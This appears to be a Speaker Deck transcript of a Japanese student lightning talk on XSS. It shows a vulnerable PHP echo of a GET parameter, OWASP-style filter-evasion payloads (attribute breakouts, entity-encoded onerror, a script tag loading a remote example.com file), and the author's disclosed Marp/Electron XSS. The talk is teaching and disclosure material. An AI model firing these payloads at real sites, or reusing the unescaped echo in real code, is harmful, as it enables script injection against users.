Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSの入力値を調べてみた / searching xss insertion value

49116ff34041caf0476b170ab193ebc5?s=47 Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.1k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

49116ff34041caf0476b170ab193ebc5?s=128

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

See All by Tomoyuki KOYAMA
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
110
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
2
220
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
1
160
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
84
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
89
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
190
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
250
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
26

Other Decks in Technology

See All in Technology
7fb060398b26ed622d34921bd64e4f5d?s=48 yoshiakiyamasaki
0
150
1dceaa2dcea41c16004f430c1723b20e?s=48 miso
0
190
842515eaf8fbb2dfcc75197e7797dc15?s=48 sat
0
180
3009eedce0d0f7ae45987a7bd8f57b85?s=48 nkjzm
0
140
B4edef9fde5f33ef95409f564d21e542?s=48 trickart
3
410
98fd7d759e70809e826fd3a35e9fe2cb?s=48 hisaotsu
2
280
Ee4f2266abb0268305431dbbcade59d2?s=48 akifumifukaya
4
1.5k
6500a96a5f0786d7ff0c53429d691ae6?s=48 kazuhiro4949
2
360
22e056dcb79e14363e844f1e57986325?s=48 aratayokoyama
0
120
B79e8f240b4b730fb692ab93ad42a89b?s=48 darquro
2
310
6ddc65998177a0f05be629dc31321a8f?s=48 kken78
0
330
15c2fcbb0358a6c4910fb043e2b1f71e?s=48 yuitosato
0
130

Featured

See All Featured
719435d98d452de7ac367c828266cf01?s=48 erikaheidi
27
5k
5f83ef806155b403c3393160ce51f955?s=48 jlugia
218
16k
C157b16234f1e75e8eac3698c1d4414a?s=48 ddemaree
273
32k
7cbd3f5f922d798cc312eaf596de7ae6?s=48 iamctodd
28
2.8k
D83926c323d4f9289f947b4b4e76b939?s=48 jensimmons
209
11k
053e75a5b48b44d6dd0612795dfb326d?s=48 notwaldorf
52
3.3k
E76911cbe088e5b850d966de3fc7435b?s=48 robhawkes
55
3k
9cde37f47e4a800ea081ea42de8d749a?s=48 dougneiner
122
8.2k
864a009ac73600c7c02e1f26629dd989?s=48 paigeccino
0
110
D36d2c1821af9249b69ff7f5ed60529b?s=48 tammielis
240
23k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
167
19k
96270e4c3e5e9806cf7245475c00b275?s=48 addyosmani
1352
200k

Transcript

  1. XSS

  2. B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc

  3. XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)

  4. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

  5. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>

  6. XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS

  7. XSS == XSS

  8. <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href

  9. XSS

  10. ? / . XSS . XSS .

  11. ?

  12. OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. ( ) 3

  14. [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">

  17. ( )

  18. ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. None

  20. Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. ?

  22. JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “

  23. XSS XSS alert() Electron